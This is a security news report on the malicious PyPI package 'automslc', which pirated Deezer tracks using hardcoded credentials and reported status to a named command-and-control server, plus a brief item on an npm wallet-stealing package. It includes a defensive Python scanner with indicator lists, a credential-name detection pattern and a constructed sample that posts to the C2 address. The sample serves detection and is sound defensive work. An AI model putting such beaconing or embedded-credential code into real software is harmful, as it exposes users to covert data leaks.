
Security researchers have discovered a malicious Python library called “automslc” on the Python Package Index (PyPI) that enables illegal music downloads from Deezer. Presented as a music automation and metadata retrieval tool, the package has been downloaded over 104,000 times since its publication in May 2019.
Socket security researcher Kirill Boychenko revealed that the package covertly bypasses Deezer’s access restrictions by using hardcoded credentials and communicating with an external command-and-control server. The malicious library logs into Deezer using both user-supplied and embedded credentials to collect track metadata and download complete audio files, violating Deezer’s API terms.
The package regularly connects to a remote server at “54.39.49.17:8031” associated with the domain “automusic.win” to report download status. This effectively transforms users’ systems into nodes in an illicit network for unauthorized bulk music downloads, potentially exposing users to legal consequences.
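As an added illustration, not code from the report or from the package itself, the following Python scanner statically flags the two traits described above in a package's source: string literals that point at the reported indicators (or any raw IPv4 endpoint) and string constants assigned to credential-looking variable names. The sample input is constructed to mimic the behaviour; the IPv4 and credential-name patterns are assumptions, not signatures from the report.

```python
import ast
import re
from pathlib import Path

# Indicators quoted in the report above: the C2 address and its associated domain.
KNOWN_C2_HOSTS = {"54.39.49.17", "automusic.win"}
IPV4_HOST = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
CRED_NAME = re.compile(r"password|passwd|secret|token|api_key|cookie", re.I)

def scan_source(src, filename="<memory>"):
    """Statically scan Python source; return a list of (kind, line, value) findings."""
    findings = []
    for node in ast.walk(ast.parse(src, filename)):
        # String literals naming a known C2 host, or any raw IPv4 endpoint.
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            # Strip scheme, path and port so "http://1.2.3.4:8031/x" yields "1.2.3.4".
            host = node.value.split("://")[-1].split("/")[0].split(":")[0]
            if host in KNOWN_C2_HOSTS:
                findings.append(("known_c2", node.lineno, node.value))
            elif IPV4_HOST.match(host):
                findings.append(("ip_literal", node.lineno, node.value))
        # Credential-looking variable names assigned a non-empty string constant.
        elif isinstance(node, ast.Assign):
            v = node.value
            if isinstance(v, ast.Constant) and isinstance(v.value, str) and v.value:
                for t in node.targets:
                    if isinstance(t, ast.Name) and CRED_NAME.search(t.id):
                        findings.append(("hardcoded_credential", node.lineno, t.id))
    return findings

def scan_package(root):
    """Scan every .py file under a directory such as site-packages/<package>."""
    report = {}
    for path in Path(root).rglob("*.py"):
        hits = scan_source(path.read_text(errors="replace"), str(path))
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample that mimics the reported behaviour; not the real package's code.
SAMPLE = '''
DEEZER_PASSWORD = "example-not-a-real-secret"
STATUS_URL = "http://54.39.49.17:8031/status"
def report(track_id, session):
    return session.post(STATUS_URL, json={"track": track_id})
'''
if __name__ == "__main__":
    for kind, line, value in scan_source(SAMPLE):
        print(f"{kind}: line {line}: {value}")
```

Run `scan_package` against a freshly installed package directory before importing it; a hit on `known_c2` is a direct match on the reported indicators, while `ip_literal` and `hardcoded_credential` are leads that need a manual look.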
In a separate incident, Socket also identified a rogue npm package called “@ton-wallet/create” that steals mnemonic phrases from TON ecosystem users while impersonating the legitimate “@ton/ton” package. Published in August 2024 with 584 downloads to date, this malicious package extracts cryptocurrency wallet information and transmits it to an attacker-controlled Telegram bot.
Following the report, the “automslc” package has been removed from PyPI.